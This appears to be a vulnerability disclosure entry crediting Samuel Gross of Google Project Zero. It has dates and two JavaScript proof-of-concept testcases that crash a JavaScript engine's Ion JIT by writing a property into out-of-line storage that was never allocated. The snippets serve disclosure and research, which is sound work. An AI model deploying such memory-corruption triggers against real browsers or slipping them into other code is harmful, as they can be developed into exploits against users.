- Report: Feb 2019
- Fix: Mar 2019
- Credit: Samuel Gross, Google Project Zero
// Run with --no-threads --ion-warmup-threshold=100
function Hax(val, l) {
this.a = val;
for (let i = 0; i < l; i++) {}
this.x = 42;
this.y = 42;
// After conversion to a NativeObject, this property
// won't fit into inline storage, but out-of-line storage
// has not been allocated, resulting in a crash @ 0x0.
this.z = 42;
}
for (let i = 0; i < 10000; i++) {
new Hax(13.37, 1);
}
let obj = new Hax("asdf", 1000000);original sample
function v5(v6, v8) {
if (v8) {
// Triggers the rollback etc. in a recursive call.
const v11 = new v5(v6);
const v13 = new Float32Array(40183);
for (const v14 of v13) {
}
}
// This property assignment crashes as out-of-line
// property storage has not been allocated yet.
this[-3083318214] = v6;
}
for (let v19 = 0; v19 < 1337; v19++) {
const v21 = new v5(32768, false);
}
const v22 = new v5(v5, true);